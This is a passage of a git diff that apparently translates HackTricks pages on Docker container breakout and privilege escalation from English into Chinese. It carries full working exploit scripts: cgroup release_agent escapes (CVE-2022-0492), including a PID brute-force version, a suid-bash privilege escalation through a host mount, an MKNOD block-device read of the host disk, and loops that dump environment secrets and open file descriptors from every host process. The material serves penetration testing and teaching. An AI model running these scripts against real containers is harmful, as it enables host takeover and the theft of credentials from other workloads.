([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC1 ```bash:Initial PoC # spawn a new container to exploit via: # docker run --rm -it --privileged ubuntu bash @@ -191,9 +168,7 @@ sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1 # Reads the output cat /o ``` - -#### Privileged Escape Abusing created release_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC2 - +#### 特权逃逸 利用创建的 release_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC2 ```bash:Second PoC # On the host docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash @@ -235,21 +210,19 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output cat /output ``` - -Find an **explanation of the technique** in: +找到**技术的解释**在: {{#ref}} docker-release_agent-cgroups-escape.md {{#endref}} -#### Privileged Escape Abusing release_agent without known the relative path - PoC3 +#### 特权逃逸 利用 release_agent 而不知道相对路径 - PoC3 -In the previous exploits the **absolute path of the container inside the hosts filesystem is disclosed**. However, this isn’t always the case. In cases where you **don’t know the absolute path of the container inside the host** you can use this technique: +在之前的漏洞中,**容器在主机文件系统中的绝对路径被泄露**。然而,这并不总是如此。在你**不知道容器在主机中的绝对路径**的情况下,你可以使用这个技术: {{#ref}} release_agent-exploit-relative-paths-to-pids.md {{#endref}} - ```bash #!/bin/sh @@ -288,20 +261,20 @@ echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release TPID=1 while [ ! -f ${OUTPUT_PATH} ] do - if [ $((${TPID} % 100)) -eq 0 ] - then - echo "Checking pid ${TPID}" - if [ ${TPID} -gt ${MAX_PID} ] - then - echo "Exiting at ${MAX_PID} :-(" - exit 1 - fi - fi - # Set the release_agent path to the guessed pid - echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent - # Trigger execution of the release_agent - sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" - TPID=$((${TPID} + 1)) +if [ $((${TPID} % 100)) -eq 0 ] +then +echo "Checking pid ${TPID}" +if [ ${TPID} -gt ${MAX_PID} ] +then +echo "Exiting at ${MAX_PID} :-(" +exit 1 +fi +fi +# Set the release_agent path to the guessed pid +echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent +# Trigger execution of the release_agent +sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" +TPID=$((${TPID} + 1)) done # Wait for and cat the output @@ -309,9 +282,7 @@ sleep 1 echo "Done! Output:" cat ${OUTPUT_PATH} ``` - -Executing the PoC within a privileged container should provide output similar to: - +在特权容器中执行 PoC 应该会提供类似于以下的输出: ```bash root@container:~$ ./release_agent_pid_brute.sh Checking pid 100 @@ -339,37 +310,33 @@ root 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq] root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0] ... ``` +#### 特权逃逸滥用敏感挂载 -#### Privileged Escape Abusing Sensitive Mounts +有几个文件可能被挂载,这些文件提供了**关于底层主机的信息**。其中一些文件甚至可能指示**当发生某些事情时由主机执行的内容**(这将允许攻击者逃离容器)。\ +滥用这些文件可能允许: -There are several files that might mounted that give **information about the underlaying host**. Some of them may even indicate **something to be executed by the host when something happens** (which will allow a attacker to escape from the container).\ -The abuse of these files may allow that: - -- release_agent (already covered before) +- release_agent(之前已经讨论过) - [binfmt_misc](sensitive-mounts.md#proc-sys-fs-binfmt_misc) - [core_pattern](sensitive-mounts.md#proc-sys-kernel-core_pattern) - [uevent_helper](sensitive-mounts.md#sys-kernel-uevent_helper) - [modprobe](sensitive-mounts.md#proc-sys-kernel-modprobe) -However, you can find **other sensitive files** to check for in this page: +然而,您可以在此页面找到**其他敏感文件**进行检查: {{#ref}} sensitive-mounts.md {{#endref}} -### Arbitrary Mounts - -In several occasions you will find that the **container has some volume mounted from the host**. If this volume wasn’t correctly configured you might be able to **access/modify sensitive data**: Read secrets, change ssh authorized_keys… +### 任意挂载 +在多种情况下,您会发现**容器从主机挂载了一些卷**。如果这个卷没有正确配置,您可能能够**访问/修改敏感数据**:读取秘密,修改ssh authorized_keys… ```bash docker run --rm -it -v /:/host ubuntu bash ``` +### 使用两个 shell 和主机挂载进行权限提升 -### Privilege Escalation with 2 shells and host mount - -If you have access as **root inside a container** that has some folder from the host mounted and you have **escaped as a non privileged user to the host** and have read access over the mounted folder.\ -You can create a **bash suid file** in the **mounted folder** inside the **container** and **execute it from the host** to privesc. - +如果您以 **root 身份访问一个容器**,该容器挂载了主机上的某个文件夹,并且您已经 **以非特权用户身份逃逸到主机**,并且对挂载的文件夹具有读取权限。\ +您可以在 **容器** 内的 **挂载文件夹** 中创建一个 **bash suid 文件**,并 **从主机执行它** 以进行权限提升。 ```bash cp /bin/bash . #From non priv inside mounted folder # You need to copy it from the host as the bash binaries might be diferent in the host and in the container @@ -377,16 +344,14 @@ chown root:root bash #From container as root inside mounted folder chmod 4777 bash #From container as root inside mounted folder bash -p #From non priv inside mounted folder ``` - ### Privilege Escalation with 2 shells -If you have access as **root inside a container** and you have **escaped as a non privileged user to the host**, you can abuse both shells to **privesc inside the host** if you have the capability MKNOD inside the container (it's by default) as [**explained in this post**](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/).\ -With such capability the root user within the container is allowed to **create block device files**. Device files are special files that are used to **access underlying hardware & kernel modules**. For example, the /dev/sda block device file gives access to **read the raw data on the systems disk**. +如果您在**容器内以root身份访问**并且已经**以非特权用户身份逃逸到主机**,您可以利用两个shell来**在主机内进行特权升级**,前提是您在容器内具有MKNOD能力(默认情况下是这样的),如[**在这篇文章中所述**](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/)。\ +拥有这样的能力,容器内的root用户被允许**创建块设备文件**。设备文件是用于**访问底层硬件和内核模块**的特殊文件。例如,/dev/sda块设备文件提供了**读取系统磁盘上原始数据的访问权限**。 -Docker safeguards against block device misuse within containers by enforcing a cgroup policy that **blocks block device read/write operations**. Nevertheless, if a block device is **created inside the container**, it becomes accessible from outside the container via the **/proc/PID/root/** directory. This access requires the **process owner to be the same** both inside and outside the container. - -**Exploitation** example from this [**writeup**](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/): +Docker通过强制执行cgroup策略来防止容器内的块设备滥用,**阻止块设备的读/写操作**。然而,如果在容器内**创建了块设备**,则可以通过**/proc/PID/root/**目录从容器外部访问。此访问要求**进程所有者在容器内外相同**。 +**利用**示例来自这篇[**文章**](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/): ```bash # On the container as root cd / @@ -422,19 +387,15 @@ augustus 1661 0.0 0.0 6116 648 pts/0 S+ 09:48 0:00 \_ augustus@GoodGames:~$ grep -a 'HTB{' /proc/1659/root/sda HTB{7h4T_w45_Tr1cKy_1_D4r3_54y} ``` - ### hostPID -If you can access the processes of the host you are going to be able to access a lot of sensitive information stored in those processes. Run test lab: - +如果您可以访问主机的进程,您将能够访问存储在这些进程中的大量敏感信息。运行测试实验室: ``` docker run --rm -it --pid=host ubuntu bash ``` +例如,您将能够使用类似 `ps auxn` 的命令列出进程,并在命令中搜索敏感细节。 -For example, you will be able to list the processes using something like `ps auxn` and search for sensitive details in the commands. - -Then, as you can **access each process of the host in /proc/ you can just steal their env secrets** running: - +然后,正如您可以 **访问 /proc/ 中主机的每个进程,您可以通过运行以下命令直接窃取它们的环境秘密**: ```bash for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done /proc/988058/environ @@ -443,9 +404,7 @@ HOSTNAME=argocd-server-69678b4f65-6mmql USER=abrgocd ... ``` - -You can also **access other processes file descriptors and read their open files**: - +您还可以**访问其他进程的文件描述符并读取它们打开的文件**: ```bash for fd in `find /proc/*/fd`; do ls -al $fd/* 2>/dev/null | grep \>; done > fds.txt less fds.txt @@ -455,91 +414,76 @@ lrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/4 -> /.secret.txt.swp # You can open the secret filw with: cat /proc/635813/fd/4 ``` - -You can also **kill processes and cause a DoS**. +您还可以**终止进程并导致 DoS**。 > [!WARNING] -> If you somehow have privileged **access over a process outside of the container**, you could run something like `nsenter --target --all` or `nsenter --target --mount --net --pid --cgroup` to **run a shell with the same ns restrictions** (hopefully none) **as that process.** +> 如果您以某种方式拥有**对容器外部进程的特权访问权限**,您可以运行类似 `nsenter --target --all` 或 `nsenter --target --mount --net --pid --cgroup` 的命令,以**在与该进程相同的 ns 限制下运行 shell**(希望没有限制)。 ### hostNetwork - ``` docker run --rm -it --network=host ubuntu bash ``` +如果一个容器使用 Docker [主机网络驱动程序 (`--network=host`)](https://docs.docker.com/network/host/) 配置,则该容器的网络栈与 Docker 主机不隔离(容器共享主机的网络命名空间),并且容器不会分配自己的 IP 地址。换句话说,**容器将所有服务直接绑定到主机的 IP**。此外,容器可以**拦截主机在共享接口上发送和接收的所有网络流量** `tcpdump -i eth0`。 -If a container was configured with the Docker [host networking driver (`--network=host`)](https://docs.docker.com/network/host/), that container's network stack is not isolated from the Docker host (the container shares the host's networking namespace), and the container does not get its own IP-address allocated. In other words, the **container binds all services directly to the host's IP**. Furthermore the container can **intercept ALL network traffic that the host** is sending and receiving on shared interface `tcpdump -i eth0`. +例如,您可以使用此方法**嗅探甚至伪造主机与元数据实例之间的流量**。 -For instance, you can use this to **sniff and even spoof traffic** between host and metadata instance. - -Like in the following examples: +如以下示例所示: - [Writeup: How to contact Google SRE: Dropping a shell in cloud SQL](https://offensi.com/2020/08/18/how-to-contact-google-sre-dropping-a-shell-in-cloud-sql/) - [Metadata service MITM allows root privilege escalation (EKS / GKE)](https://blog.champtar.fr/Metadata_MITM_root_EKS_GKE/) -You will be able also to access **network services binded to localhost** inside the host or even access the **metadata permissions of the node** (which might be different those a container can access). +您还将能够访问**绑定到 localhost 的网络服务**,甚至访问**节点的元数据权限**(这可能与容器可以访问的权限不同)。 ### hostIPC - ```bash docker run --rm -it --ipc=host ubuntu bash ``` +通过设置 `hostIPC=true`,您可以访问主机的进程间通信(IPC)资源,例如 `/dev/shm` 中的 **共享内存**。这允许读取/写入其他主机或 pod 进程使用的相同 IPC 资源。使用 `ipcs` 进一步检查这些 IPC 机制。 -With `hostIPC=true`, you gain access to the host's inter-process communication (IPC) resources, such as **shared memory** in `/dev/shm`. This allows reading/writing where the same IPC resources are used by other host or pod processes. Use `ipcs` to inspect these IPC mechanisms further. +- **检查 /dev/shm** - 查找此共享内存位置中的任何文件: `ls -la /dev/shm` +- **检查现有的 IPC 设施** – 您可以检查是否正在使用任何 IPC 设施,使用 `/usr/bin/ipcs`。检查命令为: `ipcs -a` -- **Inspect /dev/shm** - Look for any files in this shared memory location: `ls -la /dev/shm` -- **Inspect existing IPC facilities** – You can check to see if any IPC facilities are being used with `/usr/bin/ipcs`. Check it with: `ipcs -a` - -### Recover capabilities - -If the syscall **`unshare`** is not forbidden you can recover all the capabilities running: +### 恢复能力 +如果系统调用 **`unshare`** 没有被禁止,您可以通过运行来恢复所有能力: ```bash unshare -UrmCpf bash # Check them with cat /proc/self/status | grep CapEff ``` +### 用户命名空间滥用通过符号链接 -### User namespace abuse via symlink - -The second technique explained in the post [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files). - -
- -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %} +帖子中解释的第二种技术 [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) 指出如何利用用户命名空间滥用绑定挂载,以影响主机内部的文件(在特定情况下,删除文件)。 ## CVEs -### Runc exploit (CVE-2019-5736) +### Runc 漏洞 (CVE-2019-5736) -In case you can execute `docker exec` as root (probably with sudo), you try to escalate privileges escaping from a container abusing CVE-2019-5736 (exploit [here](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)). This technique will basically **overwrite** the _**/bin/sh**_ binary of the **host** **from a container**, so anyone executing docker exec may trigger the payload. +如果您可以以 root 身份执行 `docker exec`(可能使用 sudo),您可以尝试通过利用 CVE-2019-5736 来提升权限(漏洞 [在这里](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go))。该技术基本上会 **覆盖** **主机** 的 _**/bin/sh**_ 二进制文件 **从容器中**,因此任何执行 docker exec 的人都可能触发有效载荷。 -Change the payload accordingly and build the main.go with `go build main.go`. The resulting binary should be placed in the docker container for execution.\ -Upon execution, as soon as it displays `[+] Overwritten /bin/sh successfully` you need to execute the following from the host machine: +相应地更改有效载荷,并使用 `go build main.go` 构建 main.go。生成的二进制文件应放置在 docker 容器中以供执行。\ +执行时,一旦显示 `[+] Overwritten /bin/sh successfully`,您需要从主机机器执行以下命令: `docker exec -it /bin/sh` -This will trigger the payload which is present in the main.go file. +这将触发 main.go 文件中存在的有效载荷。 -For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) +更多信息: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) > [!NOTE] -> There are other CVEs the container can be vulnerable too, you can find a list in [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list) +> 容器可能还会受到其他 CVE 的影响,您可以在 [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list) 找到列表。 -## Docker Custom Escape +## Docker 自定义逃逸 -### Docker Escape Surface +### Docker 逃逸表面 -- **Namespaces:** The process should be **completely separated from other processes** via namespaces, so we cannot escape interacting with other procs due to namespaces (by default cannot communicate via IPCs, unix sockets, network svcs, D-Bus, `/proc` of other procs). -- **Root user**: By default the user running the process is the root user (however its privileges are limited). -- **Capabilities**: Docker leaves the following capabilities: `cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep` -- **Syscalls**: These are the syscalls that the **root user won't be able to call** (because of lacking capabilities + Seccomp). The other syscalls could be used to try to escape. +- **命名空间:** 进程应该通过命名空间与其他进程 **完全隔离**,因此我们无法通过命名空间与其他进程交互(默认情况下无法通过 IPC、Unix 套接字、网络服务、D-Bus、其他进程的 `/proc` 进行通信)。 +- **根用户**:默认情况下,运行进程的用户是根用户(但其权限是有限的)。 +- **能力**:Docker 保留以下能力:`cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep` +- **系统调用**:这些是 **根用户无法调用** 的系统调用(因为缺乏能力 + Seccomp)。其他系统调用可以用来尝试逃逸。 {{#tabs}} {{#tab name="x64 syscalls"}} - ```yaml 0x067 -- syslog 0x070 -- setsid @@ -560,11 +504,9 @@ For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape 0x140 -- kexec_file_load 0x141 -- bpf ``` - {{#endtab}} {{#tab name="arm64 syscalls"}} - ``` 0x029 -- pivot_root 0x059 -- acct @@ -582,11 +524,9 @@ For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape 0x111 -- finit_module 0x118 -- bpf ``` - {{#endtab}} {{#tab name="syscall_bf.c"}} - ````c // From a conversation I had with @arget131 // Fir bfing syscalss in x64 @@ -598,31 +538,32 @@ For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape int main() { - for(int i = 0; i < 333; ++i) - { - if(i == SYS_rt_sigreturn) continue; - if(i == SYS_select) continue; - if(i == SYS_pause) continue; - if(i == SYS_exit_group) continue; - if(i == SYS_exit) continue; - if(i == SYS_clone) continue; - if(i == SYS_fork) continue; - if(i == SYS_vfork) continue; - if(i == SYS_pselect6) continue; - if(i == SYS_ppoll) continue; - if(i == SYS_seccomp) continue; - if(i == SYS_vhangup) continue; - if(i == SYS_reboot) continue; - if(i == SYS_shutdown) continue; - if(i == SYS_msgrcv) continue; - printf("Probando: 0x%03x . . . ", i); fflush(stdout); - if((syscall(i, NULL, NULL, NULL, NULL, NULL, NULL) < 0) && (errno == EPERM)) - printf("Error\n"); - else - printf("OK\n"); - } +for(int i = 0; i < 333; ++i) +{ +if(i == SYS_rt_sigreturn) continue; +if(i == SYS_select) continue; +if(i == SYS_pause) continue; +if(i == SYS_exit_group) continue; +if(i == SYS_exit) continue; +if(i == SYS_clone) continue; +if(i == SYS_fork) continue; +if(i == SYS_vfork) continue; +if(i == SYS_pselect6) continue; +if(i == SYS_ppoll) continue; +if(i == SYS_seccomp) continue; +if(i == SYS_vhangup) continue; +if(i == SYS_reboot) continue; +if(i == SYS_shutdown) continue; +if(i == SYS_msgrcv) continue; +printf("Probando: 0x%03x . . . ", i); fflush(stdout); +if((syscall(i, NULL, NULL, NULL, NULL, NULL, NULL) < 0) && (errno == EPERM)) +printf("Error\n"); +else +printf("OK\n"); +} } ``` + ```` {{#endtab}} @@ -633,12 +574,12 @@ int main() If you are in **userspace** (**no kernel exploit** involved) the way to find new escapes mainly involve the following actions (these templates usually require a container in privileged mode): - Find the **path of the containers filesystem** inside the host - - You can do this via **mount**, or via **brute-force PIDs** as explained in the second release_agent exploit +- You can do this via **mount**, or via **brute-force PIDs** as explained in the second release_agent exploit - Find some functionality where you can **indicate the path of a script to be executed by a host process (helper)** if something happens - - You should be able to **execute the trigger from inside the host** - - You need to know where the containers files are located inside the host to indicate a script you write inside the host +- You should be able to **execute the trigger from inside the host** +- You need to know where the containers files are located inside the host to indicate a script you write inside the host - Have **enough capabilities and disabled protections** to be able to abuse that functionality - - You might need to **mount things** o perform **special privileged actions** you cannot do in a default docker container +- You might need to **mount things** o perform **special privileged actions** you cannot do in a default docker container ## References @@ -650,11 +591,4 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new - [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket) - [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4) -
- -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %} - {{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md index 7d16ec4a4..12b1a2bee 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md @@ -2,10 +2,9 @@ {{#include ../../../../banners/hacktricks-training.md}} -**For further details, refer to the** [**original blog post**](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)**.** This is just a summary: +**有关更多详细信息,请参阅** [**原始博客文章**](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)**。** 这只是一个摘要: Original PoC: - ```shell d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release @@ -13,49 +12,38 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o ``` +概念验证(PoC)演示了一种通过创建 `release_agent` 文件并触发其调用以在容器主机上执行任意命令来利用 cgroups 的方法。以下是涉及的步骤细分: -The proof of concept (PoC) demonstrates a method to exploit cgroups by creating a `release_agent` file and triggering its invocation to execute arbitrary commands on the container host. Here's a breakdown of the steps involved: - -1. **Prepare the Environment:** - - A directory `/tmp/cgrp` is created to serve as a mount point for the cgroup. - - The RDMA cgroup controller is mounted to this directory. In case of absence of the RDMA controller, it's suggested to use the `memory` cgroup controller as an alternative. - +1. **准备环境:** +- 创建一个目录 `/tmp/cgrp` 作为 cgroup 的挂载点。 +- 将 RDMA cgroup 控制器挂载到该目录。如果 RDMA 控制器不存在,建议使用 `memory` cgroup 控制器作为替代。 ```shell mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x ``` - -2. **Set Up the Child Cgroup:** - - A child cgroup named "x" is created within the mounted cgroup directory. - - Notifications are enabled for the "x" cgroup by writing 1 to its notify_on_release file. - +2. **设置子 Cgroup:** +- 在挂载的 cgroup 目录中创建一个名为 "x" 的子 cgroup。 +- 通过向其 notify_on_release 文件写入 1 来为 "x" cgroup 启用通知。 ```shell echo 1 > /tmp/cgrp/x/notify_on_release ``` - -3. **Configure the Release Agent:** - - The path of the container on the host is obtained from the /etc/mtab file. - - The release_agent file of the cgroup is then configured to execute a script named /cmd located at the acquired host path. - +3. **配置释放代理:** +- 从 /etc/mtab 文件中获取主机上容器的路径。 +- 然后将 cgroup 的 release_agent 文件配置为执行位于获取的主机路径上的名为 /cmd 的脚本。 ```shell host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent ``` - -4. **Create and Configure the /cmd Script:** - - The /cmd script is created inside the container and is configured to execute ps aux, redirecting the output to a file named /output in the container. The full path of /output on the host is specified. - +4. **创建和配置 /cmd 脚本:** +- /cmd 脚本在容器内创建,并配置为执行 ps aux,将输出重定向到容器中的一个名为 /output 的文件。指定了主机上 /output 的完整路径。 ```shell echo '#!/bin/sh' > /cmd echo "ps aux > $host_path/output" >> /cmd chmod a+x /cmd ``` - -5. **Trigger the Attack:** - - A process is initiated within the "x" child cgroup and is immediately terminated. - - This triggers the `release_agent` (the /cmd script), which executes ps aux on the host and writes the output to /output within the container. - +5. **触发攻击:** +- 在 "x" 子 cgroup 内启动一个进程,并立即终止。 +- 这会触发 `release_agent`(/cmd 脚本),该脚本在主机上执行 ps aux 并将输出写入容器内的 /output。 ```shell sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` - {{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md index 5c3c57d9f..90827f619 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md @@ -1,27 +1,26 @@ {{#include ../../../../banners/hacktricks-training.md}} -For further details **check the blog port from [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)**. This is just a summary: +有关更多详细信息,请**查看来自 [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)** 的博客文章。这只是一个摘要: -The technique outlines a method for **executing host code from within a container**, overcoming challenges posed by storage-driver configurations that obscure the container's filesystem path on the host, like Kata Containers or specific `devicemapper` settings. +该技术概述了一种**从容器内执行主机代码**的方法,克服了存储驱动程序配置带来的挑战,这些配置会模糊主机上的容器文件系统路径,例如 Kata Containers 或特定的 `devicemapper` 设置。 -Key steps: +关键步骤: -1. **Locating Process IDs (PIDs):** Using the `/proc//root` symbolic link in the Linux pseudo-filesystem, any file within the container can be accessed relative to the host's filesystem. This bypasses the need to know the container's filesystem path on the host. -2. **PID Bashing:** A brute force approach is employed to search through PIDs on the host. This is done by sequentially checking for the presence of a specific file at `/proc//root/`. When the file is found, it indicates that the corresponding PID belongs to a process running inside the target container. -3. **Triggering Execution:** The guessed PID path is written to the `cgroups release_agent` file. This action triggers the execution of the `release_agent`. The success of this step is confirmed by checking for the creation of an output file. +1. **定位进程 ID (PIDs):** 使用 Linux 伪文件系统中的 `/proc//root` 符号链接,可以相对于主机的文件系统访问容器内的任何文件。这绕过了需要知道主机上容器文件系统路径的要求。 +2. **PID 碰撞:** 采用暴力破解的方法搜索主机上的 PIDs。这是通过依次检查 `/proc//root/` 中特定文件的存在来完成的。当找到该文件时,表明相应的 PID 属于在目标容器内运行的进程。 +3. **触发执行:** 猜测的 PID 路径被写入 `cgroups release_agent` 文件。此操作触发 `release_agent` 的执行。通过检查输出文件的创建来确认此步骤的成功。 -### Exploitation Process +### 利用过程 -The exploitation process involves a more detailed set of actions, aiming to execute a payload on the host by guessing the correct PID of a process running inside the container. Here's how it unfolds: +利用过程涉及一系列更详细的操作,旨在通过猜测在容器内运行的进程的正确 PID 来在主机上执行有效载荷。以下是其展开方式: -1. **Initialize Environment:** A payload script (`payload.sh`) is prepared on the host, and a unique directory is created for cgroup manipulation. -2. **Prepare Payload:** The payload script, which contains the commands to be executed on the host, is written and made executable. -3. **Set Up Cgroup:** The cgroup is mounted and configured. The `notify_on_release` flag is set to ensure that the payload executes when the cgroup is released. -4. **Brute Force PID:** A loop iterates through potential PIDs, writing each guessed PID to the `release_agent` file. This effectively sets the payload script as the `release_agent`. -5. **Trigger and Check Execution:** For each PID, the cgroup's `cgroup.procs` is written to, triggering the execution of the `release_agent` if the PID is correct. The loop continues until the output of the payload script is found, indicating successful execution. - -PoC from the blog post: +1. **初始化环境:** 在主机上准备一个有效载荷脚本 (`payload.sh`),并为 cgroup 操作创建一个唯一的目录。 +2. **准备有效载荷:** 编写并使有效载荷脚本可执行,该脚本包含要在主机上执行的命令。 +3. **设置 Cgroup:** 挂载并配置 cgroup。设置 `notify_on_release` 标志,以确保在释放 cgroup 时执行有效载荷。 +4. **暴力破解 PID:** 循环遍历潜在的 PIDs,将每个猜测的 PID 写入 `release_agent` 文件。这有效地将有效载荷脚本设置为 `release_agent`。 +5. **触发并检查执行:** 对于每个 PID,写入 cgroup 的 `cgroup.procs`,如果 PID 正确,则触发 `release_agent` 的执行。循环继续,直到找到有效载荷脚本的输出,表明执行成功。 +来自博客文章的 PoC: ```bash #!/bin/sh @@ -60,20 +59,20 @@ echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release TPID=1 while [ ! -f ${OUTPUT_PATH} ] do - if [ $((${TPID} % 100)) -eq 0 ] - then - echo "Checking pid ${TPID}" - if [ ${TPID} -gt ${MAX_PID} ] - then - echo "Exiting at ${MAX_PID} :-(" - exit 1 - fi - fi - # Set the release_agent path to the guessed pid - echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent - # Trigger execution of the release_agent - sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" - TPID=$((${TPID} + 1)) +if [ $((${TPID} % 100)) -eq 0 ] +then +echo "Checking pid ${TPID}" +if [ ${TPID} -gt ${MAX_PID} ] +then +echo "Exiting at ${MAX_PID} :-(" +exit 1 +fi +fi +# Set the release_agent path to the guessed pid +echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent +# Trigger execution of the release_agent +sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" +TPID=$((${TPID} + 1)) done # Wait for and cat the output @@ -81,5 +80,4 @@ sleep 1 echo "Done! Output:" cat ${OUTPUT_PATH} ``` - {{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md index 718263059..aca2efa0b 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md @@ -1,182 +1,174 @@ -# Sensitive Mounts +# 敏感挂载 {{#include ../../../../banners/hacktricks-training.md}} -
